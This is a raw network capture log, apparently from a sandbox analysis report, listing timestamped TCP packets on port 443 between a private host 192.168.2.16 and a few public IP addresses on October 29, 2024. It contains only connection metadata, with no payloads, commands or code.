                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.994544983 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.994841099 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.994856119 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.995198011 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.995476007 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.995531082 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.995598078 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.043337107 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.050354004 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.050689936 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.050728083 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.054059029 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.054151058 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.054430008 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.054495096 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.054564953 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.054582119 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.108195066 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.149239063 CET44349777142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.204202890 CET49777443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.204238892 CET44349777142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.205127001 CET49777443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.205220938 CET44349777142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.205297947 CET49777443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.258258104 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.258316994 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.258348942 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.258382082 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.258402109 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.258415937 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.258428097 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.258433104 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.258471966 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.258691072 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.267539978 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.267633915 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.267657995 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.300211906 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.316206932 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.316236973 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.320250988 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.320317030 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.320360899 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.320399046 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.320404053 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.320436001 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.320452929 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.320476055 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.320519924 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.320528030 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.364198923 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.364207029 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.364233971 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.364497900 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.364599943 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.364661932 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.381999016 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.382239103 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.382303953 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.382318974 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.385669947 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.385730982 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.385744095 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.428225994 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.428261042 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.428670883 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.428770065 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:10.428836107 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.014548063 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.014601946 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.014738083 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.014995098 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.015010118 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.913259983 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.913650036 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.913680077 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.914747953 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.914820910 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.915205002 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.915275097 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.915407896 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.915420055 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.915543079 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.915543079 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:11.915570974 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.363986015 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.364037037 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.364072084 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.364100933 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.364101887 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.364137888 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.364176035 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.364192963 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.364243031 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.364258051 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.373411894 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.373548985 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.373565912 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.420208931 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.420236111 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.468189955 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.487637043 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.487710953 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.487930059 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.487961054 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.490390062 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.490485907 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.490495920 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.495552063 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.495632887 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.495637894 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.495764017 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.495805979 CET44349780142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.495867968 CET49780443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.498982906 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.499082088 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.499201059 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.499474049 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.499510050 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.530374050 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.530412912 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.530499935 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.530950069 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:12.530967951 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.392910004 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.393289089 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.393357038 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.394558907 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.394634962 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.394949913 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.395025969 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.395117998 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.395145893 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.407090902 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.407320023 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.407332897 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.408396959 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.408463955 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.408750057 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.408926010 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.408947945 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.441190004 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.451334000 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.457321882 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.457334042 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.505194902 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.653619051 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.653664112 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.653752089 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.653809071 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.690892935 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.690927982 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.690946102 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.690968037 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.691050053 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.691108942 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.691183090 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.691183090 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.691183090 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.691214085 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.697259903 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.697329044 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.697603941 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.697705030 CET44349781142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.697786093 CET49781443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.699201107 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.699269056 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.699290037 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.745230913 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.745244980 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.792171955 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.812587023 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.812678099 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.812707901 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.812866926 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.812876940 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.812895060 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.812947989 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.820982933 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.821074009 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.821085930 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.857709885 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.857745886 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.857789040 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.857801914 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.857850075 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.934361935 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.934447050 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.934478998 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.934675932 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.934685946 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.934772015 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.942399979 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.951827049 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.951858044 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.951961040 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.951971054 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:13.952136040 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.003026009 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.010536909 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.010571957 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.010606050 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.010711908 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.010737896 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.010754108 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.010797977 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.010828972 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.011183977 CET49785443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.011205912 CET44349785142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.017704964 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.017740011 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.017863989 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.018147945 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.018160105 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.886035919 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.886445045 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.886456013 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.887517929 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.887589931 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.887928009 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.887991905 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.888098001 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.888104916 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:14.941113949 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.156786919 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.156847000 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.156873941 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.156899929 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.156924963 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.156945944 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.156963110 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.156979084 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.157144070 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.165564060 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.165643930 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.165649891 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.212119102 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.212127924 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.260148048 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.272464037 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.272542953 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.272615910 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.272639036 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.284094095 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.284241915 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.284259081 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.288872957 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.289079905 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.289098978 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.297477961 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.297593117 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.297607899 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.340122938 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.340151072 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.387976885 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.388108969 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.388118029 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.399120092 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.399213076 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.399220943 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.404329062 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.404419899 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.404427052 CET44349791142.250.184.196192.168.2.16
